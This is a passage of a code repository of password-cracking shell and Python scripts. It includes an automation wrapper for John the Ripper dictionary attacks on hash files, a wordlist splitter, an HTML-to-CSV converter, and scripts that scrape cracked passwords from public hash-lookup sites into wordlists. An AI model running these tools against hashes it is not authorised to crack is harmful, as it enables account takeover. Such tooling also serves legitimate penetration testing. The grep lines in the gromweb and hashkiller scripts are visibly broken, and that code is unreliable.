59 | 60 | logo() { 61 | echo " " 62 | echo " /\ _|_ _ | _ |_ ._ " 63 | echo "/--\|_||_(_)\_|(_)| || |" 64 | echo " " 65 | } 66 | 67 | usage() { 68 | echo "Usage:" 69 | echo 70 | echo " ./autojohn.sh [--help|-h]" 71 | echo " show this help" 72 | echo 73 | echo " ./autojohn.sh --info" 74 | echo " show some information about dictionaries" 75 | echo 76 | echo " ./autojohn.sh " 77 | echo " list detected hash formats for file " 78 | echo 79 | echo " ./autojohn.sh []" 80 | echo " start cracking hashes with dictionary attack" 81 | echo " (warning: with rules like \"EXTRA\" or \"ALL\" it may take *ages*)" 82 | echo 83 | echo " ./autojohn.sh --sessions" 84 | echo " show sessions (both [F]inished and [R]unning)" 85 | echo 86 | echo " ./autojohn.sh --show " 87 | echo " show currently found passwords in session " 88 | echo 89 | echo " ./autojohn.sh --rules" 90 | echo " list available (optional) JohnTheRipper rules" 91 | echo 92 | echo " ./autojohn.sh --polish" 93 | echo " clean all the dictionaries by removing non-printable characters" 94 | echo " and DOS newlines (CR-LF) and finally by (unique-)sorting them" 95 | echo " (warning: depending on the size of the dictionaries, it may take" 96 | echo " a very long time and require a lot of temporary disk space)" 97 | echo 98 | echo " ./autojohn.sh --clean" 99 | echo " delete all files in pots directory (except CSV with passwords and" 100 | echo " stats) and the *.rec leftovers" 101 | echo 102 | 103 | exit 0 104 | } 105 | 106 | info() { 107 | DICT_NUM=$(find ${DICT_DIR}/*txt | wc -l | awk '{ print $1 }') 108 | DICT_SIZ=$(du -ch "${DU_A_PARAM}" ${DICT_DIR}/*txt | tail -1 | awk '{ print $1 }') 109 | 110 | echo "[+] Dictionaries directory: ${DICT_DIR}" 111 | echo "[+] Number of dictionaries: ${DICT_NUM}" 112 | echo "[+] Total dictionaries size: ${DICT_SIZ}" 113 | echo "[+] Pots directory: ${POTS_DIR}" 114 | echo 115 | 116 | exit 0 117 | } 118 | 119 | sessions() { 120 | N=$(find ${POTS_DIR}/*.pot 2> /dev/null | wc -l | awk '{ print $1 }') 121 | 122 | if [[ "${N}" -eq 0 ]] ; then 123 | 
echo "No sessions found (pots directory seems empty)." 124 | else 125 | for SESSION in $(find ${POTS_DIR}/*.pot | sed -r 's/.*\/(.*).pot.*/\1/') ; do 126 | if [[ -f "${POTS_DIR}/${SESSION}.progress" ]] ; then 127 | ps auxwww | grep john | grep -- "--session=${SESSION}" > /dev/null 128 | 129 | if [[ $? -ne 0 ]] ; then 130 | echo "[R] ${SESSION} (dead?)" 131 | else 132 | echo "[R] ${SESSION}" 133 | fi 134 | else 135 | echo "[F] ${SESSION}" 136 | fi 137 | done 138 | fi 139 | 140 | echo 141 | 142 | exit 0 143 | } 144 | 145 | rules() { 146 | john --list=rules | sort -h 147 | 148 | echo 149 | 150 | exit 0 151 | } 152 | 153 | polish() { 154 | export LC_CTYPE=C 155 | export LC_ALL=C 156 | 157 | MEMORY_USAGE="50%" # maximum memory usage for "sort" command (think before changing it!) 158 | CSV=${POTS_DIR}/polished_dicts.csv 159 | 160 | if [[ ! -w ${CSV} ]] ; then 161 | echo "FILENAME;START_TIME;END_TIME;OLD_SIZE;NEW_SIZE" > ${CSV} 162 | fi 163 | 164 | for DICT in $(ls -1Sr ${DICT_DIR}/*.txt) ; do 165 | BNDICT=$(basename "${DICT}") 166 | 167 | echo "[>] ${BNDICT}" 168 | 169 | STIME=$(date) 170 | OLDSIZE=$(du -h "${DU_A_PARAM}" "${DICT}" | awk '{ print $1 }') 171 | 172 | echo " Started at: ${STIME}" 173 | echo " Current size: ${OLDSIZE}" 174 | 175 | NEWDICT="${DICT}.NEW" 176 | 177 | tr -dc '[:print:]\n\r' < "${DICT}" > "${NEWDICT}" 178 | sleep 1 179 | dos2unix "${NEWDICT}" > /dev/null 2>&1 180 | sleep 1 181 | sort -S "${MEMORY_USAGE}" -u "${NEWDICT}" > "${DICT}" 2>&1 182 | sleep 1 183 | rm "${NEWDICT}" 184 | 185 | NEWSIZE=$(du -h "${DU_A_PARAM}" "${DICT}" | awk '{ print $1 }') 186 | ETIME=$(date) 187 | 188 | echo " New size: ${NEWSIZE}" 189 | echo " Finished at: ${ETIME}" 190 | echo "${BNDICT};${STIME};${ETIME};${OLDSIZE};${NEWSIZE}" >> ${CSV} 191 | echo 192 | done 193 | 194 | echo "Results can also be found in the following CSV file:" 195 | echo "${CSV}" 196 | echo 197 | 198 | exit 0 199 | } 200 | 201 | clean() { 202 | SCRIPT_DIR="$(cd $(dirname "$0") > /dev/null 2>&1 ; pwd -P)" 203 | rm -f ${SCRIPT_DIR}/*.rec 204 | 205 | find ${POTS_DIR} -type f -not -name 'polished_dicts.csv' -delete 206 | 207 | if [[ $? -eq 0 ]] ; then 208 | echo "Pots directory has been cleaned up." 209 | echo 210 | 211 | exit 0 212 | else 213 | echo "Error! Cannot clean pots directory: ${POTS_DIR}" 214 | echo 215 | 216 | exit 1 217 | fi 218 | } 219 | 220 | show() { 221 | SESSION=$1 222 | 223 | PRG_FILE=${POTS_DIR}/${SESSION}.progress 224 | CSV_FILE=${POTS_DIR}/${SESSION}.csv 225 | 226 | if [[ -f "${PRG_FILE}" ]] && [[ -s "${PRG_FILE}" ]] ; then # cracking is in progress 227 | echo "Found passwords in session \"${SESSION}\"": 228 | echo 229 | 230 | # not so elegant but it works... need something better btw! 231 | grep -e '(.*)' "${PRG_FILE}" | grep -v 'DONE (' | grep -v '^Loaded' | grep -v '^Node numbers' | sort -u 232 | 233 | echo 234 | elif [[ -f "${CSV_FILE}" ]] && [[ -s "${CSV_FILE}" ]] ; then # cracking has finished 235 | echo "Found passwords in session \"${SESSION}\"": 236 | echo 237 | 238 | sort -u "${CSV_FILE}" 239 | 240 | echo 241 | else 242 | echo "No passwords found (at the moment!) for session \"${SESSION}\"." 243 | echo 244 | fi 245 | } 246 | 247 | crack() { 248 | PARAMS_COUNT=$(echo "${PARAMS}" | wc -w) 249 | PARAMS_ARRAY=(${PARAMS}) 250 | 251 | if [[ "${PARAMS_COUNT}" -eq 1 ]] ; then 252 | FILE="${PARAMS_ARRAY[0]}" 253 | 254 | if [[ ! -f "${FILE}" ]] ; then 255 | echo "Error! 
Hashes file not found: ${FILE}" 256 | echo 257 | 258 | exit 1 259 | fi 260 | 261 | readarray -t FORMATS < <( 262 | { 263 | john --list=unknown "${FILE}" 2>&1 | awk -F\" '{ print $2 }' | sed -e 's/--format=//g' | sort -u | sed '/^$/d' 264 | john --list=unknown "${FILE}" 2>&1 | grep -F 'Loaded' | cut -d'(' -f2 | cut -d' ' -f1 | tr -d ',' 265 | }) 266 | 267 | if [[ ${#FORMATS[@]} -eq 0 ]] ; then 268 | echo "No valid hash formats detected!!! :-(" 269 | echo 270 | else 271 | echo "Detected hash formats:" 272 | echo 273 | 274 | FORMATS=($(echo ${FORMATS[@]} | tr ' ' '\n' | sort -u)) 275 | 276 | for F in "${FORMATS[@]}" ; do 277 | echo "- $F" 278 | done 279 | 280 | echo 281 | echo "Now, to start cracking, run:" 282 | echo "./autojohn.sh ${FILE} []" 283 | echo 284 | fi 285 | 286 | exit 0 287 | elif [[ "${PARAMS_COUNT}" -eq 3 || "${PARAMS_COUNT}" -eq 4 ]] ; then 288 | FILE="${PARAMS_ARRAY[0]}" 289 | FORMAT="${PARAMS_ARRAY[1]}" 290 | SESSION="${PARAMS_ARRAY[2]}" 291 | RULE="" 292 | 293 | if [[ "${PARAMS_COUNT}" -eq 4 ]] ; then 294 | RULE="${PARAMS_ARRAY[3]}" 295 | 296 | if [[ $(john --list=rules | grep -c -i -w "${RULE}") -eq 0 ]] ; then 297 | echo "Error! Rule does not exist: ${RULE}" 298 | echo 299 | 300 | exit 1 301 | fi 302 | fi 303 | 304 | if [[ ! -f "${FILE}" ]] ; then 305 | echo "Error! Hashes file not found: ${FILE}" 306 | echo 307 | 308 | exit 1 309 | fi 310 | 311 | if [[ ${FORMAT} == --* ]] ; then 312 | echo "Wrong value for : ${FORMAT}" 313 | echo 314 | 315 | exit 1 316 | fi 317 | 318 | if [[ ${SESSION} == --* ]] ; then 319 | echo "Wrong value for : ${SESSION}" 320 | echo 321 | 322 | exit 1 323 | fi 324 | 325 | POT_FILE=${POTS_DIR}/${SESSION}.pot 326 | PWD_FILE=${POTS_DIR}/${SESSION}.csv 327 | PROGRESS_FILE=${POTS_DIR}/${SESSION}.progress 328 | STATUS=$(john --show --pot="${POT_FILE}" --format="${FORMAT}" "${FILE}" | grep -F cracked) 329 | C=$(echo "${STATUS}" | grep -c -F ', 0 left') 330 | 331 | if [[ ${C} -eq 1 ]] ; then 332 | echo "All passwords already found! Exiting..." 333 | echo 334 | 335 | exit 0 336 | fi 337 | 338 | N=$(wc -l "${FILE}" | awk '{ print $1 }') 339 | SHA=$(shasum "${FILE}" | awk '{ print $1 }') 340 | BFILE=$(basename "${FILE}") 341 | 342 | cp "${FILE}" "${POTS_DIR}/${SESSION}_${BFILE}_${SHA}" 343 | 344 | echo "[+] Hashes file: $(readlink -f ${FILE})" 345 | echo "[+] Session name: ${SESSION}" 346 | echo "[+] Total hashes: ${N}" 347 | echo "[+] Hash format: ${FORMAT}" 348 | 349 | if [[ -z "${RULE}" ]] ; then 350 | echo "[+] Rule: *DEFAULT*" 351 | else 352 | echo "[+] Rule: ${RULE}" 353 | fi 354 | 355 | echo "[+] # of cores: ${CORES}" 356 | 357 | echo 358 | echo "===> Started at: $(date) <===" 359 | echo 360 | 361 | for DICT in $(ls -1 ${DICT_DIR}/*.txt) ; do 362 | BNDICT=$(basename "${DICT}") 363 | 364 | echo "[>] ${BNDICT}" 365 | 366 | if [[ -z "${RULE}" ]] ; then 367 | john --wordlist="${DICT}" --format="${FORMAT}" --nolog --fork="${CORES}" --session="${SESSION}" --pot="${POT_FILE}" "${FILE}" >> "${PROGRESS_FILE}" 2>&1 368 | else 369 | john --wordlist="${DICT}" --format="${FORMAT}" --nolog --fork="${CORES}" --session="${SESSION}" --pot="${POT_FILE}" --rules="${RULE}" "${FILE}" >> "${PROGRESS_FILE}" 2>&1 370 | fi 371 | 372 | STATUS=$(john --show --pot="${POT_FILE}" --format="${FORMAT}" "${FILE}" | grep -F cracked) 373 | echo "${STATUS}" 374 | 375 | C=$(echo "${STATUS}" | grep -c -F ', 0 left') 376 | 377 | if [[ ${C} -eq 1 ]] ; then 378 | echo 379 | echo "************************" 380 | echo "* Congratulations! *" 381 | echo "* All passwords found! 
*" 382 | echo "************************" 383 | 384 | break 385 | fi 386 | done 387 | 388 | echo 389 | echo "===> Finished at: $(date) <===" 390 | echo 391 | 392 | echo "--------------------------------------------------------------------------------" 393 | echo "Found passwords (saved in ${PWD_FILE}):" 394 | echo 395 | 396 | john --show --pot="${POT_FILE}" --format="${FORMAT}" "${FILE}" | grep -F ':' | sort -u | tee "${PWD_FILE}" 397 | 398 | NU=$(cat "${PWD_FILE}" | wc -l | awk '{ print $1 }') 399 | 400 | if [[ ${NU} -eq 0 ]] ; then 401 | echo "None :-(" 402 | 403 | rm -f "${PWD_FILE}" 404 | fi 405 | 406 | if [[ -f "${PROGRESS_FILE}" ]] ; then 407 | rm -f "${PROGRESS_FILE}" 408 | fi 409 | 410 | echo 411 | 412 | exit 0 413 | fi 414 | } 415 | 416 | 417 | # CHECKS ----------------------------------------------------------------------- 418 | 419 | declare -a CMDS=( 420 | "awk" 421 | "basename" 422 | "dos2unix" 423 | "john" 424 | "shasum" 425 | "tr" 426 | ); 427 | 428 | for CMD in ${CMDS[@]} ; do 429 | command_exists "${CMD}" 430 | done 431 | 432 | if [[ ! -d "${DICT_DIR}" ]] ; then 433 | echo "Error! Dictionaries directory not found: ${DICT_DIR}" 434 | 435 | exit 1 436 | else 437 | DICT_NUM=$(find ${DICT_DIR}/*.txt 2> /dev/null | wc -l) 438 | 439 | if [[ "${DICT_NUM}" -eq 0 ]] ; then 440 | echo "Error! No *.txt dictionaries found." 441 | 442 | exit 1 443 | fi 444 | fi 445 | 446 | if [[ ! -d "${POTS_DIR}" ]] ; then 447 | mkdir -p "${POTS_DIR}" 2> /dev/null 448 | 449 | if [[ "$?" -ne 0 ]] ; then 450 | echo "Error! Cannot create pots directory: ${POTS_DIR}" 451 | 452 | exit 1 453 | fi 454 | fi 455 | 456 | 457 | # MAIN ------------------------------------------------------------------------- 458 | 459 | logo 460 | 461 | if [[ "$#" -eq 0 ]] ; then 462 | usage 463 | fi 464 | 465 | PARAMS="" 466 | 467 | while (( "$#" )) ; do 468 | case "$1" in 469 | -h|--help) 470 | usage 471 | shift 472 | ;; 473 | --clean) 474 | clean 475 | shift 476 | ;; 477 | --info) 478 | info 479 | shift 480 | ;; 481 | --polish) 482 | polish 483 | shift 484 | ;; 485 | --rules) 486 | rules 487 | shift 488 | ;; 489 | --sessions) 490 | sessions 491 | shift 492 | ;; 493 | --show) 494 | if [ -n "$2" ] && [ "${2:0:1}" != "-" ] ; then 495 | show "$2" 496 | shift 2 497 | else 498 | echo "Error! Argument for $1 is missing." >&2 499 | echo 500 | 501 | exit 1 502 | fi 503 | ;; 504 | -*|--*=) # unsupported flags 505 | echo "Error! Unsupported flag: $1" >&2 506 | echo 507 | 508 | exit 1 509 | ;; 510 | *) # preserve positional arguments 511 | PARAMS="${PARAMS} $1" 512 | shift 513 | ;; 514 | esac 515 | done 516 | 517 | eval set -- "${PARAMS}" 518 | 519 | crack "${PARAMS}" 520 | -------------------------------------------------------------------------------- /Hacking/Password_Cracking/dict_split_n_sort.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: dict_split_n_sort.sh 6 | # 7 | # Description: This script takes a dictionary text file as input, reads all the 8 | # passwords in it and saves each password in a dedicated text file 9 | # depending on its first character. For example, all passwords 10 | # beginning with "a" will be saved in "a.txt", all passwords 11 | # beginning with "B" will be saved in "B.txt", and so on. 12 | # Password beginning with uncommon characters will be saved in a 13 | # file named "_others_.txt". 
14 | # 15 | # Usage: ./dict_split_n_sort.sh 16 | # 17 | # 18 | # --TODO-- 19 | # - improve and optimize code 20 | # - better checks for command line parameters, files and strings 21 | # 22 | # 23 | ################################################################################ 24 | 25 | 26 | # VARIABLES -------------------------------------------------------------------- 27 | 28 | SORTED_OUT_DIR=~/DICTIONARIES/SORTED 29 | MEMORY_USAGE="50%" 30 | CORES=4 # it only works with the GNU implementation of sort 31 | 32 | 33 | # MAIN ------------------------------------------------------------------------- 34 | 35 | if [[ "$#" -eq 0 ]] ; then 36 | echo "Usage: dict_split_n_sort.sh " 37 | 38 | exit 1 39 | fi 40 | 41 | export LC_ALL=C 42 | export LC_CTYPE=C 43 | 44 | INFILE=$1 45 | 46 | if [[ ! -f "$INFILE" ]]; then 47 | echo "Dictionary file \"$INFILE\" doesn't exist!" 48 | 49 | exit 1 50 | fi 51 | 52 | DICT=$(readlink -f $INFILE) 53 | PWDS=$(wc -l $DICT | awk '{ print $1 }') 54 | SIZE=$(du -sh $DICT | awk '{ print $1 }') 55 | 56 | mkdir -p $SORTED_OUT_DIR 57 | 58 | echo "Dictionary: $DICT" 59 | echo "Passwords: $PWDS" 60 | echo "Size: $SIZE" 61 | echo "Output dir: $SORTED_OUT_DIR" 62 | echo 63 | echo "Splitting started at: $(date)" 64 | 65 | # splitting based on "A-Za-z0-9" characters 66 | for FIRSTCHAR in $(echo {A..Z} {a..z} {0..9}) ; do 67 | echo -n "${FIRSTCHAR} " 68 | OUTFILE=$SORTED_OUT_DIR/$FIRSTCHAR.txt 69 | grep "^${FIRSTCHAR}" $DICT >> $OUTFILE 70 | done 71 | 72 | # splitting based on all the other remaining characters 73 | OUTFILE=$SORTED_OUT_DIR/_others_.txt 74 | grep -v ^'[A-Za-z0-9]' $DICT >> $OUTFILE 75 | echo -n "_others_" 76 | echo 77 | 78 | echo "Splitting finished at: $(date)" 79 | echo 80 | echo "Sorting started at: $(date)" 81 | 82 | TOT=0 83 | 84 | for CHAR_DICT in $(ls -1 $SORTED_OUT_DIR/*.txt) ; do 85 | #sort --parallel=$CORES -S $MEMORY_USAGE -u $CHAR_DICT -o $CHAR_DICT 86 | sort -S $MEMORY_USAGE -u $CHAR_DICT -o $CHAR_DICT 87 | 88 | N=$(wc -l $CHAR_DICT | awk '{ print $1 }') 89 | TOT=$((TOT+N)) 90 | 91 | echo -ne "(${CHAR_DICT})\r" 92 | done 93 | 94 | echo "Sorting finished at: $(date)" 95 | echo 96 | echo "Total passwords: $TOT" 97 | -------------------------------------------------------------------------------- /Hacking/Password_Cracking/htmltable2csv.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # -*- coding: iso-8859-1 -*- 3 | # Hello, this program is written in Python - http://python.org 4 | programname = 'html2csv - version 2002-09-20 - http://sebsauvage.net' 5 | 6 | import sys, getopt, os.path, glob, HTMLParser, re 7 | 8 | try: import psyco ; psyco.jit() # If present, use psyco to accelerate the program 9 | except: pass 10 | 11 | def usage(progname): 12 | ''' Display program usage. ''' 13 | progname = os.path.split(progname)[1] 14 | if os.path.splitext(progname)[1] in ['.py','.pyc']: progname = 'python '+progname 15 | return '''%s 16 | A coarse HTML tables to CSV (Comma-Separated Values) converter. 17 | 18 | Syntax : %s source.html 19 | 20 | Arguments : source.html is the HTML file you want to convert to CSV. 21 | By default, the file will be converted to csv with the same 22 | name and the csv extension (source.html -> source.csv) 23 | You can use * and ?. 24 | 25 | Examples : %s mypage.html 26 | : %s *.html 27 | 28 | This program is public domain. 
29 | Author : Sebastien SAUVAGE 30 | http://sebsauvage.net 31 | ''' % (programname, progname, progname, progname) 32 | 33 | class html2csv(HTMLParser.HTMLParser): 34 | ''' A basic parser which converts HTML tables into CSV. 35 | Feed HTML with feed(). Get CSV with getCSV(). (See example below.) 36 | All tables in HTML will be converted to CSV (in the order they occur 37 | in the HTML file). 38 | You can process very large HTML files by feeding this class with chunks 39 | of html while getting chunks of CSV by calling getCSV(). 40 | Should handle badly formated html (missing , , , 41 | extraneous , ...). 42 | This parser uses HTMLParser from the HTMLParser module, 43 | not HTMLParser from the htmllib module. 44 | Example: parser = html2csv() 45 | parser.feed( open('mypage.html','rb').read() ) 46 | open('mytables.csv','w+b').write( parser.getCSV() ) 47 | This class is public domain. 48 | Author: Sébastien SAUVAGE 49 | http://sebsauvage.net 50 | Versions: 51 | 2002-09-19 : - First version 52 | 2002-09-20 : - now uses HTMLParser.HTMLParser instead of htmllib.HTMLParser. 53 | - now parses command-line. 54 | To do: 55 | - handle
 tags
 56 |             - convert html entities (&name; and &#ref;) to Ascii.
 57 |             '''
 58 |     def __init__(self):
 59 |         HTMLParser.HTMLParser.__init__(self)
 60 |         self.CSV = ''      # The CSV data
 61 |         self.CSVrow = ''   # The current CSV row beeing constructed from HTML
 62 |         self.inTD = 0      # Used to track if we are inside or outside a <td>...</td> tag.
 63 |         self.inTR = 0      # Used to track if we are inside or outside a <tr>...</tr> tag.
 64 |         self.re_multiplespaces = re.compile('\s+')  # regular expression used to collapse runs of whitespace into a single space
 65 |         self.rowCount = 0  # CSV output line counter.
 66 |     def handle_starttag(self, tag, attrs):
 67 |         if   tag == 'tr': self.start_tr()
 68 |         elif tag == 'td': self.start_td()
 69 |     def handle_endtag(self, tag):
 70 |         if   tag == 'tr': self.end_tr()
 71 |         elif tag == 'td': self.end_td()         
 72 |     def start_tr(self):
 73 |         if self.inTR: self.end_tr()  # <tr> implies </tr>
 74 |         self.inTR = 1
 75 |     def end_tr(self):
 76 |         if self.inTD: self.end_td()  # </tr> implies </td>
 77 |         self.inTR = 0            
 78 |         if len(self.CSVrow) > 0:
 79 |             self.CSV += self.CSVrow[:-1]
 80 |             self.CSVrow = ''
 81 |         self.CSV += '\n'
 82 |         self.rowCount += 1
 83 |     def start_td(self):
 84 |         if not self.inTR: self.start_tr() # <td> implies <tr>
 85 |         self.CSVrow += '"'
 86 |         self.inTD = 1
 87 |     def end_td(self):
 88 |         if self.inTD:
 89 |             self.CSVrow += '",'  
 90 |             self.inTD = 0
 91 |     def handle_data(self, data):
 92 |         if self.inTD:
 93 |             self.CSVrow += self.re_multiplespaces.sub(' ',data.replace('\t',' ').replace('\n','').replace('\r','').replace('"','""'))
 94 |     def getCSV(self,purge=False):
 95 |         ''' Get output CSV.
 96 |             If purge is true, getCSV() will return all remaining data,
 97 |             even if <tr> or <td> are not properly closed.
 98 |             (You would typically call getCSV with purge=True when you do not have
 99 |             any more HTML to feed and you suspect dirty HTML (unclosed tags). '''
100 |         if purge and self.inTR: self.end_tr()  # This will also end_td and append last CSV row to output CSV.
101 |         dataout = self.CSV[:]
102 |         self.CSV = ''
103 |         return dataout
104 | 
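# The command-line driver below expands the glob given on the command line and
# converts each matching HTML file, reading the input in 8 KB chunks and writing
# out whatever CSV the parser has produced after every chunk, so very large
# pages never need to fit in memory.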
105 | if __name__ == "__main__":
106 |     try: # Put getopt in place for future usage.
107 |         opts, args = getopt.getopt(sys.argv[1:],None)
108 |     except getopt.GetoptError:
109 |         print usage(sys.argv[0])  # print help information and exit:
110 |         sys.exit(2)
111 |     if len(args) == 0:
112 |         print usage(sys.argv[0])  # print help information and exit:
113 |         sys.exit(2)       
114 |     print programname
115 |     html_files = glob.glob(args[0])
116 |     for htmlfilename in html_files:
117 |         outputfilename = os.path.splitext(htmlfilename)[0]+'.csv'
118 |         parser = html2csv()
119 |         print 'Reading %s, writing %s...' % (htmlfilename, outputfilename)
120 |         try:
121 |             htmlfile = open(htmlfilename, 'rb')
122 |             csvfile = open( outputfilename, 'w+b')
123 |             data = htmlfile.read(8192)
124 |             while data:
125 |                 parser.feed( data )
126 |                 csvfile.write( parser.getCSV() )
127 |                 sys.stdout.write('%d CSV rows written.\r' % parser.rowCount)
128 |                 data = htmlfile.read(8192)
129 |             csvfile.write( parser.getCSV(True) )
130 |             csvfile.close()
131 |             htmlfile.close()
132 |         except:
133 |             print 'Error converting %s        ' % htmlfilename
134 |             try:    htmlfile.close()
135 |             except: pass
136 |             try:    csvfile.close()
137 |             except: pass
138 |     print 'All done.'
139 | 
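A minimal usage sketch for the converter above (it needs a Python 2 interpreter;
the file names are purely illustrative). Each input file becomes a CSV with the
same base name next to it, and a quoted glob converts several pages in one run:

    python2 htmltable2csv.py results.html     # writes results.csv next to the input
    python2 htmltable2csv.py 'dumps/*.html'   # converts every matching HTML file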


--------------------------------------------------------------------------------
/Hacking/Password_Cracking/pwd_sucker_crackpot.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | #
 3 | # Author:       Riccardo Mollo (riccardomollo84@gmail.com)
 4 | #
 5 | # Name:	        pwd_sucker_crackpot.sh
 6 | #
 7 | # Description:  A script that fetches cracked passwords from the following site:
 8 | #               http://cracker.offensive-security.com/index.php
 9 | #
10 | #
11 | # --TODO--
12 | # - ???
13 | #
14 | #
15 | ################################################################################
16 | 
17 | 
18 | # VARIABLES --------------------------------------------------------------------
19 | 
20 | URL="http://cracker.offensive-security.com/index.php"
21 | DICT_DIR=~/DICTIONARIES
22 | DICT=$DICT_DIR/CUSTOM_crackpot.txt
23 | 
24 | 
25 | # FUNCTIONS --------------------------------------------------------------------
26 | 
27 | command_exists() {
28 |     command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; }
29 | }
30 | 
31 | 
32 | # CHECKS -----------------------------------------------------------------------
33 | 
34 | declare -a CMDS=(
35 | "wget"
36 | );
37 | 
38 | for CMD in ${CMDS[@]} ; do
39 |     command_exists $CMD
40 | done
41 | 
42 | 
43 | # MAIN -------------------------------------------------------------------------
44 | 
45 | [[ $DEBUG -ne 0 ]] && set -x
46 | 
47 | OUT_HTML=/tmp/.rnd-${RANDOM}.html
48 | TMP=/tmp/.crackpot.txt
49 | SDIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" >/dev/null 2>&1 && pwd)"
50 | 
51 | wget -O $OUT_HTML $URL > /dev/null 2>&1
52 | $SDIR/htmltable2csv.py $OUT_HTML > /dev/null 2>&1
53 | 
54 | OUT_CSV="$(echo $OUT_HTML | sed -e 's/html/csv/g')"
55 | 
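# keep only data rows (lines whose first quoted field starts with a digit), take the 4th CSV field
# (presumably the cracked-password column), strip its surrounding quotes and drop NOT-FOUND entries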
56 | grep '^"[0-9]' $OUT_CSV | cut -d',' -f4 | sed 's/^"\(.*\)"$/\1/' | grep -v 'NOT-FOUND' > $TMP
57 | 
58 | cat $TMP >> $DICT
59 | sort -u $DICT -o $DICT
60 | 
61 | rm -f $OUT_HTML $OUT_CSV $TMP
62 | 
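A hedged end-to-end sketch of how the wordlist grown by this script can be fed
back into autojohn.sh (documented earlier in this repository); the hashes file,
hash format and session name below are purely illustrative:

    ./pwd_sucker_crackpot.sh                        # appends new passwords to ~/DICTIONARIES/CUSTOM_crackpot.txt
    ./autojohn.sh hashes.txt Raw-MD5 crackpot_run   # dictionary attack using every *.txt under ~/DICTIONARIES
    ./autojohn.sh --show crackpot_run               # shows the passwords found so far in that session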


--------------------------------------------------------------------------------
/Hacking/Password_Cracking/pwd_sucker_gromweb.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | #
 3 | # Author:       Riccardo Mollo (riccardomollo84@gmail.com)
 4 | #
 5 | # Name:	        pwd_sucker_gromweb.sh
 6 | #
 7 | # Description:  A script that fetches cracked passwords from the following site:
 8 | #               https://md5.gromweb.com/
 9 | #
10 | #
11 | # --TODO--
12 | # - ???
13 | #
14 | #
15 | ################################################################################
16 | 
17 | 
18 | # VARIABLES --------------------------------------------------------------------
19 | 
20 | URL="https://md5.gromweb.com/"
21 | DICT_DIR=~/DICTIONARIES
22 | DICT=$DICT_DIR/CUSTOM_gromweb.txt
23 | 
24 | 
25 | # FUNCTIONS --------------------------------------------------------------------
26 | 
27 | command_exists() {
28 |     command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; }
29 | }
30 | 
31 | 
32 | # CHECKS -----------------------------------------------------------------------
33 | 
34 | declare -a CMDS=(
35 | "wget"
36 | );
37 | 
38 | for CMD in ${CMDS[@]} ; do
39 |     command_exists $CMD
40 | done
41 | 
42 | 
43 | # MAIN -------------------------------------------------------------------------
44 | 
45 | [[ $DEBUG -ne 0 ]] && set -x
46 | 
47 | OUT_HTML=/tmp/.rnd-${RANDOM}.html
48 | 
49 | wget $URL -O $OUT_HTML
50 | cat $OUT_HTML | grep -F '> $DICT
51 | 
52 | sort -u $DICT -o $DICT
53 | 
54 | rm -f $OUT_HTML
55 | 
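All of the pwd_sucker_* scripts honour a DEBUG environment variable (the
"[[ $DEBUG -ne 0 ]] && set -x" line), so a run can be traced step by step;
the value below is only an example:

    DEBUG=1 ./pwd_sucker_gromweb.sh    # set -x echoes every wget/grep/sort command as it runs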


--------------------------------------------------------------------------------
/Hacking/Password_Cracking/pwd_sucker_hashkiller.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | #
 3 | # Author:       Riccardo Mollo (riccardomollo84@gmail.com)
 4 | #
 5 | # Name:	        pwd_sucker_hashkiller.sh
 6 | #
 7 | # Description:  A script that fetches cracked passwords from the following site:
 8 | #               https://hashkiller.co.uk/
 9 | #
10 | #
11 | # --TODO--
12 | # - ???
13 | #
14 | #
15 | ################################################################################
16 | 
17 | 
18 | # VARIABLES --------------------------------------------------------------------
19 | 
20 | URL="https://hashkiller.co.uk/"
21 | DICT_DIR=~/DICTIONARIES
22 | DICT=$DICT_DIR/CUSTOM_hashkiller.txt
23 | 
24 | 
25 | # FUNCTIONS --------------------------------------------------------------------
26 | 
27 | command_exists() {
28 |     command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; }
29 | }
30 | 
31 | 
32 | # CHECKS -----------------------------------------------------------------------
33 | 
34 | declare -a CMDS=(
35 | "wget"
36 | );
37 | 
38 | for CMD in ${CMDS[@]} ; do
39 |     command_exists $CMD
40 | done
41 | 
42 | 
43 | # MAIN -------------------------------------------------------------------------
44 | 
45 | [[ $DEBUG -ne 0 ]] && set -x
46 | 
47 | OUT_HTML=/tmp/.rnd-${RANDOM}.html
48 | 
49 | wget $URL -O $OUT_HTML
50 | cat $OUT_HTML | grep -F '' | grep -vF '> $DICT
51 | 
52 | sort -u $DICT -o $DICT
53 | 
54 | rm -f $OUT_HTML
55 | 
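Each sucker script keeps its own deduplicated wordlist under ~/DICTIONARIES
(CUSTOM_*.txt), so a quick check of how much the lists have grown after a few
runs might look like this (a sketch assuming the default DICT_DIR):

    wc -l ~/DICTIONARIES/CUSTOM_*.txt    # unique passwords collected per source
    du -h ~/DICTIONARIES/CUSTOM_*.txt    # size on disk of each custom wordlist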


--------------------------------------------------------------------------------
/Hacking/Password_Cracking/pwd_sucker_md5db.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | #
 3 | # Author:       Riccardo Mollo (riccardomollo84@gmail.com)
 4 | #
 5 | # Name:	        pwd_sucker_md5db.sh
 6 | #
 7 | # Description:  A script that fetches cracked passwords from the following site:
 8 | #               https://www.nitrxgen.net/md5db/
 9 | #
10 | #
11 | # --TODO--
12 | # - ???
13 | #
14 | #
15 | ################################################################################
16 | 
17 | 
18 | # VARIABLES --------------------------------------------------------------------
19 | 
20 | URL="https://www.nitrxgen.net/md5db/"
21 | DICT_DIR=~/DICTIONARIES
22 | DICT=$DICT_DIR/CUSTOM_md5db.txt
23 | 
24 | 
25 | # FUNCTIONS --------------------------------------------------------------------
26 | 
27 | command_exists() {
28 |     command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; }
29 | }
30 | 
31 | 
32 | # CHECKS -----------------------------------------------------------------------
33 | 
34 | declare -a CMDS=(
35 | "wget"
36 | );
